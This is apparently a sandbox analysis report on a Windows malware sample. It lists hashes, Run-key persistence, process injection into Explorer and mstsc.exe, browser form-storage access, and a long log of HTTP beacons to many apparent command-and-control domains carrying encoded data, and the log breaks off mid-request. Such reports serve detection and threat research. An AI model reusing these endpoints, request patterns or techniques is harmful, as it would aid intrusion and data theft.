bca02faf8b705cffad72deb87ef895ce6626636d498e05b274b079c9ace3dc5b

Analysis

max time kernel
146s
max time network
148s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
22/11/2023, 05:18 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEW INQ vGT410267234500633.exe
Size

384KB
MD5

d94b223af3fd6bedbc1552ffc63b85cd
SHA1

d7524fd3525faa6af6d4c329167c322062fb77b6
SHA256

bca02faf8b705cffad72deb87ef895ce6626636d498e05b274b079c9ace3dc5b
SHA512

e91ef8c196f5fae0c5f097175c67c2a7a7988d384ee3bba0468deb4c22c6c3292b4b138cd382430922d80d95daed227057870364fdf0ba5ec413dd61c0162955
SSDEEP

12288:RKt9zvWPOpk/oxQD9inI3PnmLws4475zzgBQvamwvq:oLzpxQD9iIPn38zzwi

Score

7^/10

persistence

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Control Panel\International\Geo\Nation	ppxsvdjxm.exe

Executes dropped EXE 2 IoCs

pid	Process
2152	ppxsvdjxm.exe
2552	ppxsvdjxm.exe

Loads dropped DLL 4 IoCs

pid	Process
2432	NEW INQ vGT410267234500633.exe
2432	NEW INQ vGT410267234500633.exe
2152	ppxsvdjxm.exe
2896	mstsc.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Windows\CurrentVersion\Run\uqavfoktdyidm = "C:\\Users\\Admin\\AppData\\Roaming\\qvfbkgpyuen\\irnwgcl.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\ppxsvdjxm.exe\" "	ppxsvdjxm.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2152 set thread context of 2552	2152	ppxsvdjxm.exe	29
PID 2552 set thread context of 1192	2552	ppxsvdjxm.exe	10
PID 2552 set thread context of 2896	2552	ppxsvdjxm.exe	33
PID 2896 set thread context of 1192	2896	mstsc.exe	10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-3425689832-2386927309-2650718742-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	mstsc.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
2552	ppxsvdjxm.exe
2552	ppxsvdjxm.exe
2552	ppxsvdjxm.exe
2552	ppxsvdjxm.exe
2552	ppxsvdjxm.exe
2552	ppxsvdjxm.exe
2552	ppxsvdjxm.exe
2552	ppxsvdjxm.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1192	Explorer.EXE

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
2152	ppxsvdjxm.exe
2552	ppxsvdjxm.exe
1192	Explorer.EXE
1192	Explorer.EXE
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe
2896	mstsc.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2552	ppxsvdjxm.exe
Token: SeDebugPrivilege	2896	mstsc.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2432 wrote to memory of 2152	2432	NEW INQ vGT410267234500633.exe	28
PID 2432 wrote to memory of 2152	2432	NEW INQ vGT410267234500633.exe	28
PID 2432 wrote to memory of 2152	2432	NEW INQ vGT410267234500633.exe	28
PID 2432 wrote to memory of 2152	2432	NEW INQ vGT410267234500633.exe	28
PID 2152 wrote to memory of 2552	2152	ppxsvdjxm.exe	29
PID 2152 wrote to memory of 2552	2152	ppxsvdjxm.exe	29
PID 2152 wrote to memory of 2552	2152	ppxsvdjxm.exe	29
PID 2152 wrote to memory of 2552	2152	ppxsvdjxm.exe	29
PID 2152 wrote to memory of 2552	2152	ppxsvdjxm.exe	29
PID 1192 wrote to memory of 2896	1192	Explorer.EXE	33
PID 1192 wrote to memory of 2896	1192	Explorer.EXE	33
PID 1192 wrote to memory of 2896	1192	Explorer.EXE	33
PID 1192 wrote to memory of 2896	1192	Explorer.EXE	33
PID 2896 wrote to memory of 1480	2896	mstsc.exe	35
PID 2896 wrote to memory of 1480	2896	mstsc.exe	35
PID 2896 wrote to memory of 1480	2896	mstsc.exe	35
PID 2896 wrote to memory of 1480	2896	mstsc.exe	35
PID 2896 wrote to memory of 1480	2896	mstsc.exe	35

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1192
- C:\Users\Admin\AppData\Local\Temp\NEW INQ vGT410267234500633.exe
  "C:\Users\Admin\AppData\Local\Temp\NEW INQ vGT410267234500633.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2432
- - C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe
    "C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:2152
  - - C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe
      "C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:2552
- C:\Windows\SysWOW64\autofmt.exe
  "C:\Windows\SysWOW64\autofmt.exe"
  2⤵
  PID:2644
- C:\Windows\SysWOW64\mstsc.exe
  "C:\Windows\SysWOW64\mstsc.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:1480

Network

DNS

www.ljwixsb.top

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.ljwixsb.top

IN A

Response
DNS

www.mobdigim.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.mobdigim.com

IN A

Response

www.mobdigim.com

IN CNAME

mobdigim.com

mobdigim.com

IN A

136.243.92.92
GET

http://www.mobdigim.com/fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt-

Explorer.EXE

Remote address:

136.243.92.92:80

Request

GET /fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt- HTTP/1.1
Host: www.mobdigim.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 301 Moved Permanently

Connection: close
content-type: text/html
content-length: 707
date: Wed, 22 Nov 2023 05:19:15 GMT
server: LiteSpeed
location: https://www.mobdigim.com/fpt2/?pz=Hg9XM0UlQopWT4uq/OU/iYY3wdp8Cg94EtrOjqvgZSsCDfQXTUm2cy6B1CuRYksWvpJlBE+O5S0Y+caME5BMYbfNa1l7&YF6=MRgpt-
DNS

www.sqlite.org

mstsc.exe

Remote address:

8.8.8.8:53

Request

www.sqlite.org

IN A

Response

www.sqlite.org

IN A

45.33.6.223
GET

http://www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip

mstsc.exe

Remote address:

45.33.6.223:80

Request

GET /2019/sqlite-dll-win32-x86-3300000.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: www.sqlite.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Date: Wed, 22 Nov 2023 05:19:17 GMT
Last-Modified: Fri, 04 Oct 2019 22:26:08 GMT
Cache-Control: max-age=120
ETag: "m5d97c700s778c6"
Content-type: application/zip; charset=utf-8
Content-length: 489670
DNS

www.finebb.net

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.finebb.net

IN A

Response

www.finebb.net

IN A

91.194.2.86
POST

http://www.finebb.net/fpt2/

Explorer.EXE

Remote address:

91.194.2.86:80

Request

POST /fpt2/ HTTP/1.1
Host: www.finebb.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.finebb.net
Referer: http://www.finebb.net/fpt2/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Wed, 22 Nov 2023 05:19:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Location: https://finebb.net/fpt2/
Cache-Control: must-revalidate
Set-Cookie: uid=W8ICVmVdj2qiuz6uA3ZvAgA=; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/
GET

http://www.finebb.net/fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt-

Explorer.EXE

Remote address:

91.194.2.86:80

Request

GET /fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt- HTTP/1.1
Host: www.finebb.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 301 Moved Permanently

Server: nginx
Date: Wed, 22 Nov 2023 05:19:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Location: https://finebb.net/fpt2/?pz=a03iXbdPIix9fRMHzU7LE8iAlr5ha2Q41Lr6ixgTxj+lXehLxFWfCCOIk5GT/BjW7D2eUV/ItGi5aEAe2DnFKsm9EzqL&YF6=MRgpt-
Cache-Control: must-revalidate
Set-Cookie: uid=W8ICVmVdj22iuz6uA3aAAgA=; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/
DNS

www.yf168vip.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.yf168vip.com

IN A

Response

www.yf168vip.com

IN CNAME

bt-cn-3.168-system.com

bt-cn-3.168-system.com

IN A

34.92.57.107
POST

http://www.yf168vip.com/fpt2/

Explorer.EXE

Remote address:

34.92.57.107:80

Request

POST /fpt2/ HTTP/1.1
Host: www.yf168vip.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.yf168vip.com
Referer: http://www.yf168vip.com/fpt2/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 22 Nov 2023 05:19:34 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
GET

http://www.yf168vip.com/fpt2/?pz=+Pv5RKJKlOGhsp9xzDjtrCt3KaT+wN1FLngvtNJPFyCXQ9yT2cbGZ5T7ZO2Qq14r+5AArPVFnIkI6MVJnjcaY83B5jvg&YF6=MRgpt-

Explorer.EXE

Remote address:

34.92.57.107:80

Request

GET /fpt2/?pz=+Pv5RKJKlOGhsp9xzDjtrCt3KaT+wN1FLngvtNJPFyCXQ9yT2cbGZ5T7ZO2Qq14r+5AArPVFnIkI6MVJnjcaY83B5jvg&YF6=MRgpt- HTTP/1.1
Host: www.yf168vip.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 404 Not Found

Server: nginx
Date: Wed, 22 Nov 2023 05:19:36 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
DNS

www.shortfall.net

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.shortfall.net

IN A

Response

www.shortfall.net

IN A

13.248.169.48

www.shortfall.net

IN A

76.223.54.146
POST

http://www.shortfall.net/fpt2/

Explorer.EXE

Remote address:

13.248.169.48:80

Request

POST /fpt2/ HTTP/1.1
Host: www.shortfall.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.shortfall.net
Referer: http://www.shortfall.net/fpt2/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Wed, 22 Nov 2023 05:19:42 GMT
Content-Type: text/html
Content-Length: 556
Connection: close
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_A0tSUQlWfk9RcYiBisFjUp4mJhZjoalv4NIolWeZ1z/VwC4r2T9Lxeabwd6qYQX7b07cV5twCRWXJSV7TsJ7Ig
GET

http://www.shortfall.net/fpt2/?pz=BEk/HyvD1ApKclZgHhHVoRJGXzHFyBd9iCFWFrLupWJDmJhCU+tan5xFERllc5FlkjcoiH4tpQ3GJxurFh9q9fs5VQOK&YF6=MRgpt-

Explorer.EXE

Remote address:

13.248.169.48:80

Request

GET /fpt2/?pz=BEk/HyvD1ApKclZgHhHVoRJGXzHFyBd9iCFWFrLupWJDmJhCU+tan5xFERllc5FlkjcoiH4tpQ3GJxurFh9q9fs5VQOK&YF6=MRgpt- HTTP/1.1
Host: www.shortfall.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 200 OK

Server: openresty
Date: Wed, 22 Nov 2023 05:19:44 GMT
Content-Type: text/html
Content-Length: 12477
Last-Modified: Mon, 13 Nov 2023 23:35:47 GMT
Connection: close
ETag: "6552b2d3-30bd"
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_RCsCR8ZgI9ytHdgPNLErkSd00hq1wEsr07VzeJRcQ3XIQuOyvFZLYy0I+fUz+/HYWTFLzmqRMD+r0HmvhCDnCA
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Set-Cookie: caf_ipaddr=10.116.88.58;Path=/;Max-Age=86400;
Set-Cookie: country=;Path=/;Max-Age=86400;
Set-Cookie: city="";Path=/;Max-Age=86400;
Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
Accept-Ranges: bytes
DNS

www.tecverse.xyz

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.tecverse.xyz

IN A

Response

www.tecverse.xyz

IN A

203.161.61.170
POST

http://www.tecverse.xyz/fpt2/

Explorer.EXE

Remote address:

203.161.61.170:80

Request

POST /fpt2/ HTTP/1.1
Host: www.tecverse.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.tecverse.xyz
Referer: http://www.tecverse.xyz/fpt2/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 404 Not Found

Date: Wed, 22 Nov 2023 05:19:50 GMT
Server: Apache
Content-Length: 690
Connection: close
Content-Type: text/html
GET

http://www.tecverse.xyz/fpt2/?pz=kmEA0abd5YyeJVI62R5X7XpLu+SmFuKVzFUIPRx4j4eSHm+QbJspSaqzIrLQdJsv4iNbR93ZPS2DputNIuZEk+22xRga&YF6=MRgpt-

Explorer.EXE

Remote address:

203.161.61.170:80

Request

GET /fpt2/?pz=kmEA0abd5YyeJVI62R5X7XpLu+SmFuKVzFUIPRx4j4eSHm+QbJspSaqzIrLQdJsv4iNbR93ZPS2DputNIuZEk+22xRga&YF6=MRgpt- HTTP/1.1
Host: www.tecverse.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 404 Not Found

Date: Wed, 22 Nov 2023 05:19:52 GMT
Server: Apache
Content-Length: 690
Connection: close
Content-Type: text/html; charset=utf-8
DNS

www.hreeremaeps.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.hreeremaeps.com

IN A

Response

www.hreeremaeps.com

IN CNAME

hreeremaeps.com

hreeremaeps.com

IN A

185.83.146.204
POST

http://www.hreeremaeps.com/fpt2/

Explorer.EXE

Remote address:

185.83.146.204:80

Request

POST /fpt2/ HTTP/1.1
Host: www.hreeremaeps.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.hreeremaeps.com
Referer: http://www.hreeremaeps.com/fpt2/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.0 404 Not Found

Date: Wed, 22 Nov 2023 05:19:58 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
GET

http://www.hreeremaeps.com/fpt2/?pz=PVLQ1OYcDtmtS6mlaIs9mafN1rqX6opagePU/1WVbH2sXsdip4LlZsLtbV4mevB5sNCA1FFZdfEVrxwxl5AqGiugiysq&YF6=MRgpt-

Explorer.EXE

Remote address:

185.83.146.204:80

Request

GET /fpt2/?pz=PVLQ1OYcDtmtS6mlaIs9mafN1rqX6opagePU/1WVbH2sXsdip4LlZsLtbV4mevB5sNCA1FFZdfEVrxwxl5AqGiugiysq&YF6=MRgpt- HTTP/1.1
Host: www.hreeremaeps.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.0 404 Not Found

Date: Wed, 22 Nov 2023 05:20:00 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
DNS

www.shopbons-mall.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.shopbons-mall.com

IN A

Response

www.shopbons-mall.com

IN A

208.91.197.132
POST

http://www.shopbons-mall.com/fpt2/

Explorer.EXE

Remote address:

208.91.197.132:80

Request

POST /fpt2/ HTTP/1.1
Host: www.shopbons-mall.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.shopbons-mall.com
Referer: http://www.shopbons-mall.com/fpt2/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
GET

http://www.shopbons-mall.com/fpt2/?pz=6UkeOgRo4ePloh1yFoxHPsMfzZ6p6zlaujZ8SKHBP3+vyOlbx4lZ4H+sEihSMXlzaeFJp2Nsdm5H90jVgpEuC4hvrEHL&YF6=MRgpt-

Explorer.EXE

Remote address:

208.91.197.132:80

Request

GET /fpt2/?pz=6UkeOgRo4ePloh1yFoxHPsMfzZ6p6zlaujZ8SKHBP3+vyOlbx4lZ4H+sEihSMXlzaeFJp2Nsdm5H90jVgpEuC4hvrEHL&YF6=MRgpt- HTTP/1.1
Host: www.shopbons-mall.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 200 OK

Date: Wed, 22 Nov 2023 05:20:08 GMT
Server: Apache
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Connection: close
DNS

www.cmmug.asia

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.cmmug.asia

IN A

Response

www.cmmug.asia

IN A

188.114.96.0

www.cmmug.asia

IN A

188.114.97.0
POST

http://www.cmmug.asia/fpt2/

Explorer.EXE

Remote address:

188.114.96.0:80

Request

POST /fpt2/ HTTP/1.1
Host: www.cmmug.asia
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.cmmug.asia
Referer: http://www.cmmug.asia/fpt2/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 502 Bad Gateway

Date: Wed, 22 Nov 2023 05:20:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6325
Connection: close
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Or5sRs6IDBbh%2BoD2CZPC80JTAcbwgqaqlRetwdyN7T%2FM2kFevh6%2BzQxOxhJslCCp8%2Bc51RZ%2Bbf5D12ZQslJx5ssRBMAbnKIDE9NqJUXP1%2BEfEW7nc%2BVR79hpx24LbXmiAA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 829eb8db58511ece-AMS
alt-svc: h3=":443"; ma=86400
GET

http://www.cmmug.asia/fpt2/?pz=v+WmR1cg7tS0xW3sxOcH7qLyIjHIvwIYt3SWFLykJ0c2lILgMSLvRqA6qw3Mnj882j+rmYnjx3WL99L/u7fVyIhDBdb9&YF6=MRgpt-

Explorer.EXE

Remote address:

188.114.96.0:80

Request

GET /fpt2/?pz=v+WmR1cg7tS0xW3sxOcH7qLyIjHIvwIYt3SWFLykJ0c2lILgMSLvRqA6qw3Mnj882j+rmYnjx3WL99L/u7fVyIhDBdb9&YF6=MRgpt- HTTP/1.1
Host: www.cmmug.asia
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 502 Bad Gateway

Date: Wed, 22 Nov 2023 05:20:17 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 15
Connection: close
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=67yG8PpQRAA8EpJluWDwC5oNoCScc%2FJlFrrij%2Bjpl3WRJ5LWcLAaabXu1ktHC%2BjEfkojNC56Vusb7BCcP%2F491a3wGdMfFYhTNA2tgmpcUPvDSYTr1CpdpL8F53pP3%2BcS9w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 829eb8eb3e8966c3-AMS
alt-svc: h3=":443"; ma=86400
DNS

www.333vvs.com

Explorer.EXE

Remote address:

8.8.8.8:53

Request

www.333vvs.com

IN A

Response

www.333vvs.com

IN A

34.120.175.65

www.333vvs.com

IN A

35.244.161.158
POST

http://www.333vvs.com/fpt2/

Explorer.EXE

Remote address:

34.120.175.65:80

Request

POST /fpt2/ HTTP/1.1
Host: www.333vvs.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.333vvs.com
Referer: http://www.333vvs.com/fpt2/
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31

Response

HTTP/1.1 405 Method Not Allowed

Server: nginx/1.20.2
Date: Wed, 22 Nov 2023 05:20:22 GMT
Content-Type: text/html
Content-Length: 559
Via: 1.1 google
Connection: close
GET

http://www.333vvs.com/fpt2/?pz=fXnFlfaj4bnF07Ur9jveJK9dI70BJd2bKF9irEfQcuBCqwd6ATMFeUvwAAuNXbAn8HdTrUcpf4Du0ZgIUjZaDVOeDAKa&YF6=MRgpt-

Explorer.EXE

Remote address:

34.120.175.65:80

Request

GET /fpt2/?pz=fXnFlfaj4bnF07Ur9jveJK9dI70BJd2bKF9irEfQcuBCqwd6ATMFeUvwAAuNXbAn8HdTrUcpf4Du0ZgIUjZaDVOeDAKa&YF6=MRgpt- HTTP/1.1
Host: www.333vvs.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
